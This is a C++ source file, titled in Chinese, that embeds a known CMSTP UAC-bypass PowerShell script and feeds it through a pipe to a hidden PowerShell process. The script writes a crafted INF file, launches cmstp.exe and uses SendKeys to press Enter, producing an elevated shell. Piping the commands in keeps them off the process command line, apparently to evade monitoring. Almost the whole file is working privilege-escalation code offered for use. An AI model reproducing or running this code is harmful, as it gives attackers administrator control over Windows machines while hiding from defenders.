創建無敏感參數 PowerShell 進程並自動化逐行輸入 CMSTP UAC 提權指令完成提權

CMSTP_UACBypass_viaPowerShell.cpp

#include <windows.h>
#include <iostream>

// CMSTP UAC Bypass PowerShell Version.
// ref: https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1
auto cmstp_uacbypass_ps1 = "# UAC Bypass poc using SendKeys\n"
"# Version 1.0\n"
"# Author: Oddvar Moe\n"
"# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/\n"
"# Todo: Hide window on screen for stealth\n"
"# Todo: Make script edit the INF file for command to inject...\n"
"\n"
"\n"
"Function script:Set-INFFile {\n"
"[CmdletBinding()]\n"
"\tParam (\n"
"\t[Parameter(HelpMessage=\"Specify the INF file location\")]\n"
"\t$InfFileLocation = \"$env:temp\\CMSTP.inf\",\n"
"\t\n"
"\t[Parameter(HelpMessage=\"Specify the command to launch in a UAC-privileged window\")]\n"
"\t[String]$CommandToExecute = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n"
"\t)\n"
"\n"
"$InfContent = @\"\n"
"[version]\n"
"Signature=`$chicago`$\n"
"AdvancedINF=2.5\n"
"\n"
"[DefaultInstall]\n"
"CustomDestination=CustInstDestSectionAllUsers\n"
"RunPreSetupCommands=RunPreSetupCommandsSection\n"
"\n"
"[RunPreSetupCommandsSection]\n"
"; Commands Here will be run Before Setup Begins to install\n"
"$CommandToExecute  -NoExit echo 'hello from Evil Admin >:)'\n"
"taskkill /IM cmstp.exe /F\n"
"\n"
"[CustInstDestSectionAllUsers]\n"
"49000,49001=AllUSer_LDIDSection, 7\n"
"\n"
"[AllUSer_LDIDSection]\n"
"\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%\", \"\"\n"
"\n"
"[Strings]\n"
"ServiceName=\"CorpVPN\"\n"
"ShortSvcName=\"CorpVPN\"\n"
"\n"
"\"@\n"
"\n"
"$InfContent | Out-File $InfFileLocation -Encoding ASCII\n"
"}\n"
"\n"
"\n"
"Function Get-Hwnd\n"
"{\n"
"  [CmdletBinding()]\n"
"    \n"
"  Param\n"
"  (\n"
"    [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName\n"
"  )\n"
"  Process\n"
"    {\n"
"        $ErrorActionPreference = 'Stop'\n"
"        Try \n"
"        {\n"
"            $hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle\n"
"        }\n"
"        Catch \n"
"        {\n"
"            $hwnd = $null\n"
"        }\n"
"        $hash = @{\n"
"        ProcessName = $ProcessName\n"
"        Hwnd        = $hwnd\n"
"        }\n"
"        \n"
"    New-Object -TypeName PsObject -Property $hash\n"
"    }\n"
"}\n"
"\n"
"function Set-WindowActive\n"
"{\n"
"  [CmdletBinding()]\n"
"\n"
"  Param\n"
"  (\n"
"    [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name\n"
"  )\n"
"  \n"
"  Process\n"
"  {\n"
"    $memberDefinition = @'\n"
"    [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\n"
"    [DllImport(\"user32.dll\", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);\n"
"\n"
"'@\n"
"\n"
"    Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32\n"
"    $hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd\n"
"    If ($hwnd) \n"
"    {\n"
"      $onTop = New-Object -TypeName System.IntPtr -ArgumentList (0)\n"
"      [User32.Api]::SetForegroundWindow($hwnd)\n"
"      [User32.Api]::ShowWindow($hwnd, 5)\n"
"    }\n"
"    Else \n"
"    {\n"
"      [string] $hwnd = 'N/A'\n"
"    }\n"
"\n"
"    $hash = @{\n"
"      Process = $Name\n"
"      Hwnd    = $hwnd\n"
"    }\n"
"        \n"
"    New-Object -TypeName PsObject -Property $hash\n"
"  }\n"
"}\n"
"\n"
". Set-INFFile\n"
"#Needs Windows forms\n"
"add-type -AssemblyName System.Windows.Forms\n"
"If (Test-Path $InfFileLocation) {\n"
"#Command to run\n"
"$ps = new-object system.diagnostics.processstartinfo \"c:\\windows\\system32\\cmstp.exe\"\n"
"$ps.Arguments = \"/au $InfFileLocation\"\n"
"$ps.UseShellExecute = $false\n"
"\n"
"#Start it\n"
"[system.diagnostics.process]::Start($ps)\n"
"\n"
"do\n"
"{\n"
"\t# Do nothing until cmstp is an active window\n"
"}\n"
"until ((Set-WindowActive cmstp).Hwnd -ne 0)\n"
"\n"
"\n"
"#Activate window\n"
"Set-WindowActive cmstp\n"
"\n"
"#Send the Enter key\n"
"[System.Windows.Forms.SendKeys]::SendWait(\"{ENTER}\")\n"
"}\n"
"[System.Windows.Forms.MessageBox]::Show('Hello from Low IL' , '3Ocm.tw')\n"
"\n";

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    // 定義Powershell命令
    wchar_t powershellCmd[] = L"powershell.exe -NoExit";

    // 定義變量
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    SECURITY_ATTRIBUTES sa;
    HANDLE hStdInRead, hStdInWrite, hStdOutRead, hStdOutWrite;
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(si);
    memset(&pi, 0, sizeof(pi));
    memset(&sa, 0, sizeof(sa));
    sa.nLength = sizeof(sa);
    sa.bInheritHandle = TRUE;

    // 創建管道
    CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0);
    SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0);
    CreatePipe(&hStdInRead, &hStdInWrite, &sa, 0);
    SetHandleInformation(hStdInWrite, HANDLE_FLAG_INHERIT, 0);

    
    // 配置STARTUPINFO
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdOutput = hStdOutWrite;
    si.hStdError = hStdOutWrite;
    si.hStdInput = hStdInRead;

    // 創建Powershell進程
    CreateProcessW(NULL, (LPWSTR)powershellCmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);

    // 關閉不必要的句柄
    CloseHandle(hStdOutWrite);
    CloseHandle(hStdInRead);

    // 向Powershell進程輸入命令
    const char* command = cmstp_uacbypass_ps1;
    DWORD written;
    WriteFile(hStdInWrite, command, strlen(command), &written, NULL);

    // 讀取Powershell進程的輸出
    CHAR buffer[4096];
    DWORD read;
    while (ReadFile(hStdOutRead, buffer, sizeof(buffer) - 1, &read, NULL) && read > 0) {
        buffer[read] = '\0';
        std::cout << buffer;
    }

    // 關閉句柄
    CloseHandle(hStdInWrite);
    CloseHandle(hStdOutRead);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    
    return 0;
}